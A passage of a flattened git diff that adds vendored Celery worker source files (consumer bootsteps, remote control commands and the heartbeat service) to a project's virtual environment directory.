ack_log_error_promise.then(self._restore_prefetch_count_after_connection_restart, + on_error=self._restore_prefetch_count_after_connection_restart) + reject_log_error_promise.then(self._restore_prefetch_count_after_connection_restart, + on_error=self._restore_prefetch_count_after_connection_restart) + + strategy( + message, payload, + ack_log_error_promise, + reject_log_error_promise, + callbacks, + ) + except (InvalidTaskError, ContentDisallowed) as exc: + return on_invalid_task(payload, message, exc) + except DecodeError as exc: + return self.on_decode_error(message, exc) + + return on_task_received + + def _restore_prefetch_count_after_connection_restart(self, p, *args): + with self.qos._mutex: + if self._maximum_prefetch_restored: + return + + new_prefetch_count = min(self.max_prefetch_count, self._new_prefetch_count) + self.qos.value = self.initial_prefetch_count = new_prefetch_count + self.qos.set(self.qos.value) + + already_restored = self._maximum_prefetch_restored + self._maximum_prefetch_restored = new_prefetch_count == self.max_prefetch_count + + if already_restored is False and self._maximum_prefetch_restored is True: + logger.info( + "Resuming normal operations following a restart.\n" + f"Prefetch count has been restored to the maximum of {self.max_prefetch_count}" + ) + + @property + def max_prefetch_count(self): + return self.pool.num_processes * self.prefetch_multiplier + + @property + def _new_prefetch_count(self): + return self.qos.value + self.prefetch_multiplier + + def __repr__(self): + """``repr(self)``.""" + return ''.format( + self=self, state=self.blueprint.human_state(), + ) + + +class Evloop(bootsteps.StartStopStep): + """Event loop service. + + Note: + This is always started last. + """ + + label = 'event loop' + last = True + + def start(self, c): + self.patch_all(c) + c.loop(*c.loop_args()) + + def patch_all(self, c): + c.qos._mutex = DummyLock() diff --git a/env/Lib/site-packages/celery/worker/consumer/control.py b/env/Lib/site-packages/celery/worker/consumer/control.py new file mode 100644 index 00000000..b0ca3ef8 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/control.py @@ -0,0 +1,33 @@ +"""Worker Remote Control Bootstep. + +``Control`` -> :mod:`celery.worker.pidbox` -> :mod:`kombu.pidbox`. + +The actual commands are implemented in :mod:`celery.worker.control`. +""" +from celery import bootsteps +from celery.utils.log import get_logger +from celery.worker import pidbox + +from .tasks import Tasks + +__all__ = ('Control',) + +logger = get_logger(__name__) + + +class Control(bootsteps.StartStopStep): + """Remote control command service.""" + + requires = (Tasks,) + + def __init__(self, c, **kwargs): + self.is_green = c.pool is not None and c.pool.is_green + self.box = (pidbox.gPidbox if self.is_green else pidbox.Pidbox)(c) + self.start = self.box.start + self.stop = self.box.stop + self.shutdown = self.box.shutdown + super().__init__(c, **kwargs) + + def include_if(self, c): + return (c.app.conf.worker_enable_remote_control and + c.conninfo.supports_exchange_type('fanout')) diff --git a/env/Lib/site-packages/celery/worker/consumer/events.py b/env/Lib/site-packages/celery/worker/consumer/events.py new file mode 100644 index 00000000..7ff47356 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/events.py @@ -0,0 +1,68 @@ +"""Worker Event Dispatcher Bootstep. + +``Events`` -> :class:`celery.events.EventDispatcher`. +""" +from kombu.common import ignore_errors + +from celery import bootsteps + +from .connection import Connection + +__all__ = ('Events',) + + +class Events(bootsteps.StartStopStep): + """Service used for sending monitoring events.""" + + requires = (Connection,) + + def __init__(self, c, + task_events=True, + without_heartbeat=False, + without_gossip=False, + **kwargs): + self.groups = None if task_events else ['worker'] + self.send_events = ( + task_events or + not without_gossip or + not without_heartbeat + ) + self.enabled = self.send_events + c.event_dispatcher = None + super().__init__(c, **kwargs) + + def start(self, c): + # flush events sent while connection was down. + prev = self._close(c) + dis = c.event_dispatcher = c.app.events.Dispatcher( + c.connection_for_write(), + hostname=c.hostname, + enabled=self.send_events, + groups=self.groups, + # we currently only buffer events when the event loop is enabled + # XXX This excludes eventlet/gevent, which should actually buffer. + buffer_group=['task'] if c.hub else None, + on_send_buffered=c.on_send_event_buffered if c.hub else None, + ) + if prev: + dis.extend_buffer(prev) + dis.flush() + + def stop(self, c): + pass + + def _close(self, c): + if c.event_dispatcher: + dispatcher = c.event_dispatcher + # remember changes from remote control commands: + self.groups = dispatcher.groups + + # close custom connection + if dispatcher.connection: + ignore_errors(c, dispatcher.connection.close) + ignore_errors(c, dispatcher.close) + c.event_dispatcher = None + return dispatcher + + def shutdown(self, c): + self._close(c) diff --git a/env/Lib/site-packages/celery/worker/consumer/gossip.py b/env/Lib/site-packages/celery/worker/consumer/gossip.py new file mode 100644 index 00000000..16e1c2ef --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/gossip.py @@ -0,0 +1,205 @@ +"""Worker <-> Worker communication Bootstep.""" +from collections import defaultdict +from functools import partial +from heapq import heappush +from operator import itemgetter + +from kombu import Consumer +from kombu.asynchronous.semaphore import DummyLock +from kombu.exceptions import ContentDisallowed, DecodeError + +from celery import bootsteps +from celery.utils.log import get_logger +from celery.utils.objects import Bunch + +from .mingle import Mingle + +__all__ = ('Gossip',) + +logger = get_logger(__name__) +debug, info = logger.debug, logger.info + + +class Gossip(bootsteps.ConsumerStep): + """Bootstep consuming events from other workers. + + This keeps the logical clock value up to date. + """ + + label = 'Gossip' + requires = (Mingle,) + _cons_stamp_fields = itemgetter( + 'id', 'clock', 'hostname', 'pid', 'topic', 'action', 'cver', + ) + compatible_transports = {'amqp', 'redis'} + + def __init__(self, c, without_gossip=False, + interval=5.0, heartbeat_interval=2.0, **kwargs): + self.enabled = not without_gossip and self.compatible_transport(c.app) + self.app = c.app + c.gossip = self + self.Receiver = c.app.events.Receiver + self.hostname = c.hostname + self.full_hostname = '.'.join([self.hostname, str(c.pid)]) + self.on = Bunch( + node_join=set(), + node_leave=set(), + node_lost=set(), + ) + + self.timer = c.timer + if self.enabled: + self.state = c.app.events.State( + on_node_join=self.on_node_join, + on_node_leave=self.on_node_leave, + max_tasks_in_memory=1, + ) + if c.hub: + c._mutex = DummyLock() + self.update_state = self.state.event + self.interval = interval + self.heartbeat_interval = heartbeat_interval + self._tref = None + self.consensus_requests = defaultdict(list) + self.consensus_replies = {} + self.event_handlers = { + 'worker.elect': self.on_elect, + 'worker.elect.ack': self.on_elect_ack, + } + self.clock = c.app.clock + + self.election_handlers = { + 'task': self.call_task + } + + super().__init__(c, **kwargs) + + def compatible_transport(self, app): + with app.connection_for_read() as conn: + return conn.transport.driver_type in self.compatible_transports + + def election(self, id, topic, action=None): + self.consensus_replies[id] = [] + self.dispatcher.send( + 'worker-elect', + id=id, topic=topic, action=action, cver=1, + ) + + def call_task(self, task): + try: + self.app.signature(task).apply_async() + except Exception as exc: # pylint: disable=broad-except + logger.exception('Could not call task: %r', exc) + + def on_elect(self, event): + try: + (id_, clock, hostname, pid, + topic, action, _) = self._cons_stamp_fields(event) + except KeyError as exc: + return logger.exception('election request missing field %s', exc) + heappush( + self.consensus_requests[id_], + (clock, f'{hostname}.{pid}', topic, action), + ) + self.dispatcher.send('worker-elect-ack', id=id_) + + def start(self, c): + super().start(c) + self.dispatcher = c.event_dispatcher + + def on_elect_ack(self, event): + id = event['id'] + try: + replies = self.consensus_replies[id] + except KeyError: + return # not for us + alive_workers = set(self.state.alive_workers()) + replies.append(event['hostname']) + + if len(replies) >= len(alive_workers): + _, leader, topic, action = self.clock.sort_heap( + self.consensus_requests[id], + ) + if leader == self.full_hostname: + info('I won the election %r', id) + try: + handler = self.election_handlers[topic] + except KeyError: + logger.exception('Unknown election topic %r', topic) + else: + handler(action) + else: + info('node %s elected for %r', leader, id) + self.consensus_requests.pop(id, None) + self.consensus_replies.pop(id, None) + + def on_node_join(self, worker): + debug('%s joined the party', worker.hostname) + self._call_handlers(self.on.node_join, worker) + + def on_node_leave(self, worker): + debug('%s left', worker.hostname) + self._call_handlers(self.on.node_leave, worker) + + def on_node_lost(self, worker): + info('missed heartbeat from %s', worker.hostname) + self._call_handlers(self.on.node_lost, worker) + + def _call_handlers(self, handlers, *args, **kwargs): + for handler in handlers: + try: + handler(*args, **kwargs) + except Exception as exc: # pylint: disable=broad-except + logger.exception( + 'Ignored error from handler %r: %r', handler, exc) + + def register_timer(self): + if self._tref is not None: + self._tref.cancel() + self._tref = self.timer.call_repeatedly(self.interval, self.periodic) + + def periodic(self): + workers = self.state.workers + dirty = set() + for worker in workers.values(): + if not worker.alive: + dirty.add(worker) + self.on_node_lost(worker) + for worker in dirty: + workers.pop(worker.hostname, None) + + def get_consumers(self, channel): + self.register_timer() + ev = self.Receiver(channel, routing_key='worker.#', + queue_ttl=self.heartbeat_interval) + return [Consumer( + channel, + queues=[ev.queue], + on_message=partial(self.on_message, ev.event_from_message), + no_ack=True + )] + + def on_message(self, prepare, message): + _type = message.delivery_info['routing_key'] + + # For redis when `fanout_patterns=False` (See Issue #1882) + if _type.split('.', 1)[0] == 'task': + return + try: + handler = self.event_handlers[_type] + except KeyError: + pass + else: + return handler(message.payload) + + # proto2: hostname in header; proto1: in body + hostname = (message.headers.get('hostname') or + message.payload['hostname']) + if hostname != self.hostname: + try: + _, event = prepare(message.payload) + self.update_state(event) + except (DecodeError, ContentDisallowed, TypeError) as exc: + logger.error(exc) + else: + self.clock.forward() diff --git a/env/Lib/site-packages/celery/worker/consumer/heart.py b/env/Lib/site-packages/celery/worker/consumer/heart.py new file mode 100644 index 00000000..076f5f9a --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/heart.py @@ -0,0 +1,36 @@ +"""Worker Event Heartbeat Bootstep.""" +from celery import bootsteps +from celery.worker import heartbeat + +from .events import Events + +__all__ = ('Heart',) + + +class Heart(bootsteps.StartStopStep): + """Bootstep sending event heartbeats. + + This service sends a ``worker-heartbeat`` message every n seconds. + + Note: + Not to be confused with AMQP protocol level heartbeats. + """ + + requires = (Events,) + + def __init__(self, c, + without_heartbeat=False, heartbeat_interval=None, **kwargs): + self.enabled = not without_heartbeat + self.heartbeat_interval = heartbeat_interval + c.heart = None + super().__init__(c, **kwargs) + + def start(self, c): + c.heart = heartbeat.Heart( + c.timer, c.event_dispatcher, self.heartbeat_interval, + ) + c.heart.start() + + def stop(self, c): + c.heart = c.heart and c.heart.stop() + shutdown = stop diff --git a/env/Lib/site-packages/celery/worker/consumer/mingle.py b/env/Lib/site-packages/celery/worker/consumer/mingle.py new file mode 100644 index 00000000..532ab75e --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/mingle.py @@ -0,0 +1,76 @@ +"""Worker <-> Worker Sync at startup (Bootstep).""" +from celery import bootsteps +from celery.utils.log import get_logger + +from .events import Events + +__all__ = ('Mingle',) + +logger = get_logger(__name__) +debug, info, exception = logger.debug, logger.info, logger.exception + + +class Mingle(bootsteps.StartStopStep): + """Bootstep syncing state with neighbor workers. + + At startup, or upon consumer restart, this will: + + - Sync logical clocks. + - Sync revoked tasks. + + """ + + label = 'Mingle' + requires = (Events,) + compatible_transports = {'amqp', 'redis'} + + def __init__(self, c, without_mingle=False, **kwargs): + self.enabled = not without_mingle and self.compatible_transport(c.app) + super().__init__( + c, without_mingle=without_mingle, **kwargs) + + def compatible_transport(self, app): + with app.connection_for_read() as conn: + return conn.transport.driver_type in self.compatible_transports + + def start(self, c): + self.sync(c) + + def sync(self, c): + info('mingle: searching for neighbors') + replies = self.send_hello(c) + if replies: + info('mingle: sync with %s nodes', + len([reply for reply, value in replies.items() if value])) + [self.on_node_reply(c, nodename, reply) + for nodename, reply in replies.items() if reply] + info('mingle: sync complete') + else: + info('mingle: all alone') + + def send_hello(self, c): + inspect = c.app.control.inspect(timeout=1.0, connection=c.connection) + our_revoked = c.controller.state.revoked + replies = inspect.hello(c.hostname, our_revoked._data) or {} + replies.pop(c.hostname, None) # delete my own response + return replies + + def on_node_reply(self, c, nodename, reply): + debug('mingle: processing reply from %s', nodename) + try: + self.sync_with_node(c, **reply) + except MemoryError: + raise + except Exception as exc: # pylint: disable=broad-except + exception('mingle: sync with %s failed: %r', nodename, exc) + + def sync_with_node(self, c, clock=None, revoked=None, **kwargs): + self.on_clock_event(c, clock) + self.on_revoked_received(c, revoked) + + def on_clock_event(self, c, clock): + c.app.clock.adjust(clock) if clock else c.app.clock.forward() + + def on_revoked_received(self, c, revoked): + if revoked: + c.controller.state.revoked.update(revoked) diff --git a/env/Lib/site-packages/celery/worker/consumer/tasks.py b/env/Lib/site-packages/celery/worker/consumer/tasks.py new file mode 100644 index 00000000..b4e4aee9 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/tasks.py @@ -0,0 +1,65 @@ +"""Worker Task Consumer Bootstep.""" +from kombu.common import QoS, ignore_errors + +from celery import bootsteps +from celery.utils.log import get_logger + +from .mingle import Mingle + +__all__ = ('Tasks',) + +logger = get_logger(__name__) +debug = logger.debug + + +class Tasks(bootsteps.StartStopStep): + """Bootstep starting the task message consumer.""" + + requires = (Mingle,) + + def __init__(self, c, **kwargs): + c.task_consumer = c.qos = None + super().__init__(c, **kwargs) + + def start(self, c): + """Start task consumer.""" + c.update_strategies() + + # - RabbitMQ 3.3 completely redefines how basic_qos works... + # This will detect if the new qos semantics is in effect, + # and if so make sure the 'apply_global' flag is set on qos updates. + qos_global = not c.connection.qos_semantics_matches_spec + + # set initial prefetch count + c.connection.default_channel.basic_qos( + 0, c.initial_prefetch_count, qos_global, + ) + + c.task_consumer = c.app.amqp.TaskConsumer( + c.connection, on_decode_error=c.on_decode_error, + ) + + def set_prefetch_count(prefetch_count): + return c.task_consumer.qos( + prefetch_count=prefetch_count, + apply_global=qos_global, + ) + c.qos = QoS(set_prefetch_count, c.initial_prefetch_count) + + def stop(self, c): + """Stop task consumer.""" + if c.task_consumer: + debug('Canceling task consumer...') + ignore_errors(c, c.task_consumer.cancel) + + def shutdown(self, c): + """Shutdown task consumer.""" + if c.task_consumer: + self.stop(c) + debug('Closing consumer channel...') + ignore_errors(c, c.task_consumer.close) + c.task_consumer = None + + def info(self, c): + """Return task consumer info.""" + return {'prefetch_count': c.qos.value if c.qos else 'N/A'} diff --git a/env/Lib/site-packages/celery/worker/control.py b/env/Lib/site-packages/celery/worker/control.py new file mode 100644 index 00000000..41d059e4 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/control.py @@ -0,0 +1,624 @@ +"""Worker remote control command implementations.""" +import io +import tempfile +from collections import UserDict, defaultdict, namedtuple + +from billiard.common import TERM_SIGNAME +from kombu.utils.encoding import safe_repr + +from celery.exceptions import WorkerShutdown +from celery.platforms import signals as _signals +from celery.utils.functional import maybe_list +from celery.utils.log import get_logger +from celery.utils.serialization import jsonify, strtobool +from celery.utils.time import rate + +from . import state as worker_state +from .request import Request + +__all__ = ('Panel',) + +DEFAULT_TASK_INFO_ITEMS = ('exchange', 'routing_key', 'rate_limit') +logger = get_logger(__name__) + +controller_info_t = namedtuple('controller_info_t', [ + 'alias', 'type', 'visible', 'default_timeout', + 'help', 'signature', 'args', 'variadic', +]) + + +def ok(value): + return {'ok': value} + + +def nok(value): + return {'error': value} + + +class Panel(UserDict): + """Global registry of remote control commands.""" + + data = {} # global dict. + meta = {} # -"- + + @classmethod + def register(cls, *args, **kwargs): + if args: + return cls._register(**kwargs)(*args) + return cls._register(**kwargs) + + @classmethod + def _register(cls, name=None, alias=None, type='control', + visible=True, default_timeout=1.0, help=None, + signature=None, args=None, variadic=None): + + def _inner(fun): + control_name = name or fun.__name__ + _help = help or (fun.__doc__ or '').strip().split('\n')[0] + cls.data[control_name] = fun + cls.meta[control_name] = controller_info_t( + alias, type, visible, default_timeout, + _help, signature, args, variadic) + if alias: + cls.data[alias] = fun + return fun + return _inner + + +def control_command(**kwargs): + return Panel.register(type='control', **kwargs) + + +def inspect_command(**kwargs): + return Panel.register(type='inspect', **kwargs) + +# -- App + + +@inspect_command() +def report(state): + """Information about Celery installation for bug reports.""" + return ok(state.app.bugreport()) + + +@inspect_command( + alias='dump_conf', # XXX < backwards compatible + signature='[include_defaults=False]', + args=[('with_defaults', strtobool)], +) +def conf(state, with_defaults=False, **kwargs): + """List configuration.""" + return jsonify(state.app.conf.table(with_defaults=with_defaults), + keyfilter=_wanted_config_key, + unknown_type_filter=safe_repr) + + +def _wanted_config_key(key): + return isinstance(key, str) and not key.startswith('__') + + +# -- Task + +@inspect_command( + variadic='ids', + signature='[id1 [id2 [... [idN]]]]', +) +def query_task(state, ids, **kwargs): + """Query for task information by id.""" + return { + req.id: (_state_of_task(req), req.info()) + for req in _find_requests_by_id(maybe_list(ids)) + } + + +def _find_requests_by_id(ids, + get_request=worker_state.requests.__getitem__): + for task_id in ids: + try: + yield get_request(task_id) + except KeyError: + pass + + +def _state_of_task(request, + is_active=worker_state.active_requests.__contains__, + is_reserved=worker_state.reserved_requests.__contains__): + if is_active(request): + return 'active' + elif is_reserved(request): + return 'reserved' + return 'ready' + + +@control_command( + variadic='task_id', + signature='[id1 [id2 [... [idN]]]]', +) +def revoke(state, task_id, terminate=False, signal=None, **kwargs): + """Revoke task by task id (or list of ids). + + Keyword Arguments: + terminate (bool): Also terminate the process if the task is active. + signal (str): Name of signal to use for terminate (e.g., ``KILL``). + """ + # pylint: disable=redefined-outer-name + # XXX Note that this redefines `terminate`: + # Outside of this scope that is a function. + # supports list argument since 3.1 + task_ids, task_id = set(maybe_list(task_id) or []), None + task_ids = _revoke(state, task_ids, terminate, signal, **kwargs) + if isinstance(task_ids, dict) and 'ok' in task_ids: + return task_ids + return ok(f'tasks {task_ids} flagged as revoked') + + +@control_command( + variadic='headers', + signature='[key1=value1 [key2=value2 [... [keyN=valueN]]]]', +) +def revoke_by_stamped_headers(state, headers, terminate=False, signal=None, **kwargs): + """Revoke task by header (or list of headers). + + Keyword Arguments: + headers(dictionary): Dictionary that contains stamping scheme name as keys and stamps as values. + If headers is a list, it will be converted to a dictionary. + terminate (bool): Also terminate the process if the task is active. + signal (str): Name of signal to use for terminate (e.g., ``KILL``). + Sample headers input: + {'mtask_id': [id1, id2, id3]} + """ + # pylint: disable=redefined-outer-name + # XXX Note that this redefines `terminate`: + # Outside of this scope that is a function. + # supports list argument since 3.1 + signum = _signals.signum(signal or TERM_SIGNAME) + + if isinstance(headers, list): + headers = {h.split('=')[0]: h.split('=')[1] for h in headers} + + for header, stamps in headers.items(): + updated_stamps = maybe_list(worker_state.revoked_stamps.get(header) or []) + list(maybe_list(stamps)) + worker_state.revoked_stamps[header] = updated_stamps + + if not terminate: + return ok(f'headers {headers} flagged as revoked, but not terminated') + + active_requests = list(worker_state.active_requests) + + terminated_scheme_to_stamps_mapping = defaultdict(set) + + # Terminate all running tasks of matching headers + # Go through all active requests, and check if one of the + # requests has a stamped header that matches the given headers to revoke + + for req in active_requests: + # Check stamps exist + if hasattr(req, "stamps") and req.stamps: + # if so, check if any stamps match a revoked stamp + for expected_header_key, expected_header_value in headers.items(): + if expected_header_key in req.stamps: + expected_header_value = maybe_list(expected_header_value) + actual_header = maybe_list(req.stamps[expected_header_key]) + matching_stamps_for_request = set(actual_header) & set(expected_header_value) + # Check any possible match regardless if the stamps are a sequence or not + if matching_stamps_for_request: + terminated_scheme_to_stamps_mapping[expected_header_key].update(matching_stamps_for_request) + req.terminate(state.consumer.pool, signal=signum) + + if not terminated_scheme_to_stamps_mapping: + return ok(f'headers {headers} were not terminated') + return ok(f'headers {terminated_scheme_to_stamps_mapping} revoked') + + +def _revoke(state, task_ids, terminate=False, signal=None, **kwargs): + size = len(task_ids) + terminated = set() + + worker_state.revoked.update(task_ids) + if terminate: + signum = _signals.signum(signal or TERM_SIGNAME) + for request in _find_requests_by_id(task_ids): + if request.id not in terminated: + terminated.add(request.id) + logger.info('Terminating %s (%s)', request.id, signum) + request.terminate(state.consumer.pool, signal=signum) + if len(terminated) >= size: + break + + if not terminated: + return ok('terminate: tasks unknown') + return ok('terminate: {}'.format(', '.join(terminated))) + + idstr = ', '.join(task_ids) + logger.info('Tasks flagged as revoked: %s', idstr) + return task_ids + + +@control_command( + variadic='task_id', + args=[('signal', str)], + signature=' [id1 [id2 [... [idN]]]]' +) +def terminate(state, signal, task_id, **kwargs): + """Terminate task by task id (or list of ids).""" + return revoke(state, task_id, terminate=True, signal=signal) + + +@control_command( + args=[('task_name', str), ('rate_limit', str)], + signature=' ', +) +def rate_limit(state, task_name, rate_limit, **kwargs): + """Tell worker(s) to modify the rate limit for a task by type. + + See Also: + :attr:`celery.app.task.Task.rate_limit`. + + Arguments: + task_name (str): Type of task to set rate limit for. + rate_limit (int, str): New rate limit. + """ + # pylint: disable=redefined-outer-name + # XXX Note that this redefines `terminate`: + # Outside of this scope that is a function. + try: + rate(rate_limit) + except ValueError as exc: + return nok(f'Invalid rate limit string: {exc!r}') + + try: + state.app.tasks[task_name].rate_limit = rate_limit + except KeyError: + logger.error('Rate limit attempt for unknown task %s', + task_name, exc_info=True) + return nok('unknown task') + + state.consumer.reset_rate_limits() + + if not rate_limit: + logger.info('Rate limits disabled for tasks of type %s', task_name) + return ok('rate limit disabled successfully') + + logger.info('New rate limit for tasks of type %s: %s.', + task_name, rate_limit) + return ok('new rate limit set successfully') + + +@control_command( + args=[('task_name', str), ('soft', float), ('hard', float)], + signature=' [hard_secs]', +) +def time_limit(state, task_name=None, hard=None, soft=None, **kwargs): + """Tell worker(s) to modify the time limit for task by type. + + Arguments: + task_name (str): Name of task to change. + hard (float): Hard time limit. + soft (float): Soft time limit. + """ + try: + task = state.app.tasks[task_name] + except KeyError: + logger.error('Change time limit attempt for unknown task %s', + task_name, exc_info=True) + return nok('unknown task') + + task.soft_time_limit = soft + task.time_limit = hard + + logger.info('New time limits for tasks of type %s: soft=%s hard=%s', + task_name, soft, hard) + return ok('time limits set successfully') + + +# -- Events + + +@inspect_command() +def clock(state, **kwargs): + """Get current logical clock value.""" + return {'clock': state.app.clock.value} + + +@control_command() +def election(state, id, topic, action=None, **kwargs): + """Hold election. + + Arguments: + id (str): Unique election id. + topic (str): Election topic. + action (str): Action to take for elected actor. + """ + if state.consumer.gossip: + state.consumer.gossip.election(id, topic, action) + + +@control_command() +def enable_events(state): + """Tell worker(s) to send task-related events.""" + dispatcher = state.consumer.event_dispatcher + if dispatcher.groups and 'task' not in dispatcher.groups: + dispatcher.groups.add('task') + logger.info('Events of group {task} enabled by remote.') + return ok('task events enabled') + return ok('task events already enabled') + + +@control_command() +def disable_events(state): + """Tell worker(s) to stop sending task-related events.""" + dispatcher = state.consumer.event_dispatcher + if 'task' in dispatcher.groups: + dispatcher.groups.discard('task') + logger.info('Events of group {task} disabled by remote.') + return ok('task events disabled') + return ok('task events already disabled') + + +@control_command() +def heartbeat(state): + """Tell worker(s) to send event heartbeat immediately.""" + logger.debug('Heartbeat requested by remote.') + dispatcher = state.consumer.event_dispatcher + dispatcher.send('worker-heartbeat', freq=5, **worker_state.SOFTWARE_INFO) + + +# -- Worker + +@inspect_command(visible=False) +def hello(state, from_node, revoked=None, **kwargs): + """Request mingle sync-data.""" + # pylint: disable=redefined-outer-name + # XXX Note that this redefines `revoked`: + # Outside of this scope that is a function. + if from_node != state.hostname: + logger.info('sync with %s', from_node) + if revoked: + worker_state.revoked.update(revoked) + # Do not send expired items to the other worker. + worker_state.revoked.purge() + return { + 'revoked': worker_state.revoked._data, + 'clock': state.app.clock.forward(), + } + + +@inspect_command(default_timeout=0.2) +def ping(state, **kwargs): + """Ping worker(s).""" + return ok('pong') + + +@inspect_command() +def stats(state, **kwargs): + """Request worker statistics/information.""" + return state.consumer.controller.stats() + + +@inspect_command(alias='dump_schedule') +def scheduled(state, **kwargs): + """List of currently scheduled ETA/countdown tasks.""" + return list(_iter_schedule_requests(state.consumer.timer)) + + +def _iter_schedule_requests(timer): + for waiting in timer.schedule.queue: + try: + arg0 = waiting.entry.args[0] + except (IndexError, TypeError): + continue + else: + if isinstance(arg0, Request): + yield { + 'eta': arg0.eta.isoformat() if arg0.eta else None, + 'priority': waiting.priority, + 'request': arg0.info(), + } + + +@inspect_command(alias='dump_reserved') +def reserved(state, **kwargs): + """List of currently reserved tasks, not including scheduled/active.""" + reserved_tasks = ( + state.tset(worker_state.reserved_requests) - + state.tset(worker_state.active_requests) + ) + if not reserved_tasks: + return [] + return [request.info() for request in reserved_tasks] + + +@inspect_command(alias='dump_active') +def active(state, safe=False, **kwargs): + """List of tasks currently being executed.""" + return [request.info(safe=safe) + for request in state.tset(worker_state.active_requests)] + + +@inspect_command(alias='dump_revoked') +def revoked(state, **kwargs): + """List of revoked task-ids.""" + return list(worker_state.revoked) + + +@inspect_command( + alias='dump_tasks', + variadic='taskinfoitems', + signature='[attr1 [attr2 [... [attrN]]]]', +) +def registered(state, taskinfoitems=None, builtins=False, **kwargs): + """List of registered tasks. + + Arguments: + taskinfoitems (Sequence[str]): List of task attributes to include. + Defaults to ``exchange,routing_key,rate_limit``. + builtins (bool): Also include built-in tasks. + """ + reg = state.app.tasks + taskinfoitems = taskinfoitems or DEFAULT_TASK_INFO_ITEMS + + tasks = reg if builtins else ( + task for task in reg if not task.startswith('celery.')) + + def _extract_info(task): + fields = { + field: str(getattr(task, field, None)) for field in taskinfoitems + if getattr(task, field, None) is not None + } + if fields: + info = ['='.join(f) for f in fields.items()] + return '{} [{}]'.format(task.name, ' '.join(info)) + return task.name + + return [_extract_info(reg[task]) for task in sorted(tasks)] + + +# -- Debugging + +@inspect_command( + default_timeout=60.0, + args=[('type', str), ('num', int), ('max_depth', int)], + signature='[object_type=Request] [num=200 [max_depth=10]]', +) +def objgraph(state, num=200, max_depth=10, type='Request'): # pragma: no cover + """Create graph of uncollected objects (memory-leak debugging). + + Arguments: + num (int): Max number of objects to graph. + max_depth (int): Traverse at most n levels deep. + type (str): Name of object to graph. Default is ``"Request"``. + """ + try: + import objgraph as _objgraph + except ImportError: + raise ImportError('Requires the objgraph library') + logger.info('Dumping graph for type %r', type) + with tempfile.NamedTemporaryFile(prefix='cobjg', + suffix='.png', delete=False) as fh: + objects = _objgraph.by_type(type)[:num] + _objgraph.show_backrefs( + objects, + max_depth=max_depth, highlight=lambda v: v in objects, + filename=fh.name, + ) + return {'filename': fh.name} + + +@inspect_command() +def memsample(state, **kwargs): + """Sample current RSS memory usage.""" + from celery.utils.debug import sample_mem + return sample_mem() + + +@inspect_command( + args=[('samples', int)], + signature='[n_samples=10]', +) +def memdump(state, samples=10, **kwargs): # pragma: no cover + """Dump statistics of previous memsample requests.""" + from celery.utils import debug + out = io.StringIO() + debug.memdump(file=out) + return out.getvalue() + +# -- Pool + + +@control_command( + args=[('n', int)], + signature='[N=1]', +) +def pool_grow(state, n=1, **kwargs): + """Grow pool by n processes/threads.""" + if state.consumer.controller.autoscaler: + return nok("pool_grow is not supported with autoscale. Adjust autoscale range instead.") + else: + state.consumer.pool.grow(n) + state.consumer._update_prefetch_count(n) + return ok('pool will grow') + + +@control_command( + args=[('n', int)], + signature='[N=1]', +) +def pool_shrink(state, n=1, **kwargs): + """Shrink pool by n processes/threads.""" + if state.consumer.controller.autoscaler: + return nok("pool_shrink is not supported with autoscale. Adjust autoscale range instead.") + else: + state.consumer.pool.shrink(n) + state.consumer._update_prefetch_count(-n) + return ok('pool will shrink') + + +@control_command() +def pool_restart(state, modules=None, reload=False, reloader=None, **kwargs): + """Restart execution pool.""" + if state.app.conf.worker_pool_restarts: + state.consumer.controller.reload(modules, reload, reloader=reloader) + return ok('reload started') + else: + raise ValueError('Pool restarts not enabled') + + +@control_command( + args=[('max', int), ('min', int)], + signature='[max [min]]', +) +def autoscale(state, max=None, min=None): + """Modify autoscale settings.""" + autoscaler = state.consumer.controller.autoscaler + if autoscaler: + max_, min_ = autoscaler.update(max, min) + return ok(f'autoscale now max={max_} min={min_}') + raise ValueError('Autoscale not enabled') + + +@control_command() +def shutdown(state, msg='Got shutdown from remote', **kwargs): + """Shutdown worker(s).""" + logger.warning(msg) + raise WorkerShutdown(msg) + + +# -- Queues + +@control_command( + args=[ + ('queue', str), + ('exchange', str), + ('exchange_type', str), + ('routing_key', str), + ], + signature=' [exchange [type [routing_key]]]', +) +def add_consumer(state, queue, exchange=None, exchange_type=None, + routing_key=None, **options): + """Tell worker(s) to consume from task queue by name.""" + state.consumer.call_soon( + state.consumer.add_task_queue, + queue, exchange, exchange_type or 'direct', routing_key, **options) + return ok(f'add consumer {queue}') + + +@control_command( + args=[('queue', str)], + signature='', +) +def cancel_consumer(state, queue, **_): + """Tell worker(s) to stop consuming from task queue by name.""" + state.consumer.call_soon( + state.consumer.cancel_task_queue, queue, + ) + return ok(f'no longer consuming from {queue}') + + +@inspect_command() +def active_queues(state): + """List the task queues a worker is currently consuming from.""" + if state.consumer.task_consumer: + return [dict(queue.as_dict(recurse=True)) + for queue in state.consumer.task_consumer.queues] + return [] diff --git a/env/Lib/site-packages/celery/worker/heartbeat.py b/env/Lib/site-packages/celery/worker/heartbeat.py new file mode 100644 index 00000000..efdcc3b4 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/heartbeat.py @@ -0,0 +1,61 @@ +"""Heartbeat service. + +This is the internal thread responsible for sending heartbeat events +at regular intervals (may not be an actual thread). +""" +from celery.signals import heartbeat_sent +from celery.utils.sysinfo import load_average + +from .state import SOFTWARE_INFO, active_requests, all_total_count + +__all__ = ('Heart',) + + +class Heart: + """Timer sending heartbeats at regular intervals. + + Arguments: + timer (kombu.asynchronous.timer.Timer): Timer to use. + eventer (celery.events.EventDispatcher): Event dispatcher + to use. + interval (float): Time in seconds between sending + heartbeats. Default is 2 seconds. + """ + + def __init__(self, timer, eventer, interval=None): + self.timer = timer + self.eventer = eventer + self.interval = float(interval or 2.0) + self.tref = None + + # Make event dispatcher start/stop us when enabled/disabled. + self.eventer.on_enabled.add(self.start) + self.eventer.on_disabled.add(self.stop) + + # Only send heartbeat_sent signal if it has receivers. + self._send_sent_signal = ( + heartbeat_sent.send if heartbeat_sent.receivers else None) + + def _send(self, event, retry=True): + if self._send_sent_signal is not None: + self._send_sent_signal(sender=self) + return self.eventer.send(event, freq=self.interval, + active=len(active_requests), + processed=all_total_count[0], + loadavg=load_average(), + retry=retry, + 